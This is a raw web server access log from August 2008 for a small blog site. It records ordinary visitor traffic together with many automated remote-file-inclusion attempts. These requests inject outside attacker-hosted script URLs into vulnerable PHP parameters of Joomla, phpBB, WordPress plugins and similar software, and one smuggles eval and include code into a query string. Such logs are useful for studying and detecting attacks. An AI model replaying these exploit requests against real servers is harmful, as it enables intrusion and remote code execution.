151.1.140.201 - - [18/Aug/2008:09:21:50 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:21:51 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:21:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-037_4.jpg HTTP/1.1" 200 365192 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:22:01 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-038_4.jpg HTTP/1.1" 200 299334 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:22:02 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1021.jpg HTTP/1.1" 200 311999 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:09:22:05 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-040_4.jpg HTTP/1.1" 200 237841 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:22:14 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
58.25.217.217 - - [18/Aug/2008:09:22:47 -0700] "GET /logs/access_080321.log//index.php?loc=&lang=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.25.217.217 - - [18/Aug/2008:09:22:49 -0700] "GET //index.php?loc=&lang=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 11044 "-" "libwww-perl/5.79" "www.dmulk.com"
58.25.217.217 - - [18/Aug/2008:09:22:49 -0700] "GET /logs//index.php?loc=&lang=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:22:58 -0700] "GET /logs/access_080410.log//faqsupport/samplefaqsupport.php?path[docroot]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:23:12 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:23:14 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.236.10.71 - - [18/Aug/2008:09:23:25 -0700] "GET /logs/access_080606.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [18/Aug/2008:09:23:25 -0700] "GET /logs/access_080605.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:23:26 -0700] "GET /logs/access_080630.log/admincp/auth/checklogin.php?cfgProgDir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:23:27 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:23:28 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:09:23:48 -0700] "GET /logs/access_080626.log/admincp/auth/checklogin.php?cfgProgDir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.236.10.71 - - [18/Aug/2008:09:24:08 -0700] "GET /logs/access_080626.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:25:35 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:25:38 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.110.75 - - [18/Aug/2008:09:25:41 -0700] "GET /blog HTTP/1.0" 301 69 "http://search.live.com/results.aspx?q=motorcycles&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.75 - - [18/Aug/2008:09:25:43 -0700] "GET /blog/ HTTP/1.0" 200 10811 "http://search.live.com/results.aspx?q=motorcycles&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.75 - - [18/Aug/2008:09:25:43 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.75 - - [18/Aug/2008:09:25:43 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.75 - - [18/Aug/2008:09:25:43 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.75 - - [18/Aug/2008:09:25:43 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.75 - - [18/Aug/2008:09:25:44 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
193.254.185.89 - - [18/Aug/2008:09:25:44 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.110.75 - - [18/Aug/2008:09:25:44 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
193.254.185.89 - - [18/Aug/2008:09:25:44 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.185.89 - - [18/Aug/2008:09:25:46 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:09:26:48 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:09:26:48 -0700] "GET /logs/access.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:09:26:48 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:27:03 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:27:04 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:27:05 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:27:06 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:09:27:13 -0700] "GET /logs/access.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:09:27:13 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:09:27:14 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:27:18 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:27:19 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:09:27:27 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:09:27:27 -0700] "GET /logs/access.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:09:27:27 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:27:27 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:27:56 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:27:56 -0700] "GET /phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:28:38 -0700] "GET /logs/access_080114.log//claroline/phpbb/page_tail.php?includePath=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:28:42 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:28:44 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:29:18 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:29:18 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:29:18 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:29:33 -0700] "GET /logs/access_080626.log/admincp/auth/checklogin.php?cfgProgDir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.20.229.11 - - [18/Aug/2008:09:29:39 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.20.229.11 - - [18/Aug/2008:09:29:46 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.177.28.101 - - [18/Aug/2008:09:30:52 -0700] "GET /logs/access_080303.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.20.229.11 - - [18/Aug/2008:09:31:05 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.businesshost.it/base/attachments/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:31:21 -0700] "GET /logs/access_080131.log/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:31:21 -0700] "GET /errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:31:23 -0700] "GET //?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 200 11000 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:31:23 -0700] "GET //?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 200 11000 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:31:24 -0700] "GET /logs/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:31:25 -0700] "GET //?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 200 11000 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:31:40 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:31:55 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:31:55 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:31:55 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:31:55 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:31:55 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:31:56 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.21.66 - - [18/Aug/2008:09:32:05 -0700] "GET /logs/access_080708.log//codebb/lang_select?phpbb_root_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [18/Aug/2008:09:32:05 -0700] "GET /logs/access_080713.log//codebb/lang_select?phpbb_root_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:09:32:23 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:32:36 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:32:36 -0700] "GET /logs/access_080706.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:32:37 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.200.223 - - [18/Aug/2008:09:32:37 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albforum.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.200.223 - - [18/Aug/2008:09:32:37 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albforum.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:32:47 -0700] "GET /logs/access_080621.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:32:56 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:32:56 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:33:05 -0700] "GET /logs/access_080415.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:33:05 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:33:07 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:33:12 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.7.235.75 - - [18/Aug/2008:09:33:27 -0700] "GET /logs/path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.7.235.75 - - [18/Aug/2008:09:33:27 -0700] "GET /path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.177.28.101 - - [18/Aug/2008:09:33:42 -0700] "GET /logs/access_080201.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:34:06 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:34:09 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:34:09 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:34:10 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:34:24 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:34:24 -0700] "GET /errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:34:24 -0700] "GET /logs/access_080408.log/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:34:27 -0700] "GET /logs/errors.php?error=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.7.235.75 - - [18/Aug/2008:09:34:27 -0700] "GET /logs/path%5Bdocroot%5D=http://utilz.info/a4?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.7.235.75 - - [18/Aug/2008:09:34:28 -0700] "GET /path%5Bdocroot%5D=http://utilz.info/a4?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:09:34:56 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:34:59 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:34:59 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:35:03 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.113.253.128 - - [18/Aug/2008:09:35:18 -0700] "GET /logs/access_080724.log//include/bbs.lib.inc.php?site_path=http://www.mcsautomoveis.com/teste/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.253.128 - - [18/Aug/2008:09:35:18 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.mcsautomoveis.com/teste/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
